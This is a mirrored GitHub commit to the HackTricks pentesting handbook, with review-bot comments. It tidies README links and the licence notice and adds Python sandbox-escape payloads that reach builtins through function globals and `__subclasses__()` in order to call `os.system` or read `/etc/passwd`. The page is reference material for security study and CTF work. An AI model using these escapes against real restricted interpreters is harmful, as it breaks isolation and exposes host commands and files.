mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [master] 517 pages modified
parent
14ead4a692
commit
8625431ec6
2 changed files with 23 additions and 11 deletions
18
README.md
|
@ -20,8 +20,8 @@ Here you will find the **typical flow** that **you should follow when pentesting
|
|||
|
||||
**Click in the title to start!**
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.
|
||||
**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book.
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm).
|
||||
**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
|
||||
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
|
||||
|
||||
{% hint style="danger" %}
|
||||
|
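Review bot: the rewritten pull-requests line fixes the visible link text but keeps a mangled target, `https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks`; point it at `https://github.com/carlospolop/hacktricks`. On the rewritten Twitter line the bird emoji link is still wrapped in `****` and `\*\*\*\*`, and the bold opened before "that will be reflected in this book." only closes on the following "Don't forget to**" line, which leaves `\*\*` showing literally after "github". Cleaning those up in the same change would finish the job this hunk starts.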
@ -32,17 +32,15 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
|
|||
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
## Corporate Sponsors
|
||||
|
||||
### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\*
|
||||
### [**INE**](https://ine.com/)
|
||||
|
||||
![](.gitbook/assets/ine_logo-3-.jpg)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
|
||||
|
||||
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
|
||||
[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
|
||||
|
||||
#### **Courses and Certifications reviews**
|
||||
|
||||
|
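Review bot: the first line of this hunk is left with the bird emoji linking to `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md`, which is a conversion artifact rather than a real page. Since this hunk already strips the `\*\*\*\*` debris from the INE heading and paragraph, fix that target here too (the earlier section uses `https://emojipedia.org/bird/`). The INE paragraph also keeps "provides with the official courses" and a trailing `**.**` that could be tidied in the same pass.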
@ -50,7 +48,9 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
|
|||
|
||||
{% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
|
||||
|
||||
\*\*\*\*
|
||||
|
||||
|
||||
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
|
||||
|
||||
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
|
||||
|
||||
|
|
|
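Review bot: the bare `\*\*\*\*` line ahead of the copyright notice is escaping debris that will render as literal asterisks; drop it. The notice itself goes from the 2020 Commons Clause wording ("use this content freely WITHOUT commercial use") to "the rights of the text ... are reserved" for 2021, which changes the terms for readers and should be stated in the commit message instead of arriving under "517 pages modified".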
@ -206,9 +206,13 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
|
|||
#### Python3
|
||||
|
||||
```python
|
||||
# Obtain the builtins from a defined function
|
||||
get_flag.__globals__['__builtins__'].__import__("os").system("ls")
|
||||
# Obtain builtins from a globally defined function
|
||||
print.__self__
|
||||
dir.__self__
|
||||
globals.__self__
|
||||
|
||||
# Obtain the builtins from a defined function
|
||||
get_flag.__globals__['__builtins__']
|
||||
|
||||
# The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
|
||||
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
|
||||
|
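Review bot: the new comment "# Obtain builtins from a globally defined function" above `print.__self__`, `dir.__self__` and `globals.__self__` is misleading, because those three are built-in functions and `__self__` on them is the `builtins` module; something like "# Obtain the builtins module from a built-in function" says what the lines do. The `get_flag.__globals__['__builtins__']` line now stops at the lookup, so a short comment noting that the value can be either the module or its dict, depending on where `get_flag` is defined, would tell the reader which access form to use with it.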
@ -227,6 +231,14 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__
|
|||
__builtins__["__import__"]('os').system('ls')
|
||||
```
|
||||
|
||||
### Builtins payloads
|
||||
|
||||
```python
|
||||
# Possible payloads once you have found the builtins
|
||||
.open("/etc/passwd").read()
|
||||
.__import__("os").system("ls")
|
||||
```
|
||||
|
||||
### Discovering loaded variables
|
||||
|
||||
Checking the **`globals`** and **`locals`** is a good way to know what you can access.
|
||||
|
|
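Review bot: the two lines in the new "Builtins payloads" block, `.open("/etc/passwd").read()` and `.__import__("os").system("ls")`, start with a dot, so the block is tagged `python` but is not valid Python on its own. Add a comment that these are suffixes to append to whichever builtins expression was found above, or write them against a placeholder name. The context line just above the new section uses subscript access (`__builtins__["__import__"]`), so the block should also say that the attribute form applies when the object is the module and the subscript form when it is the dict.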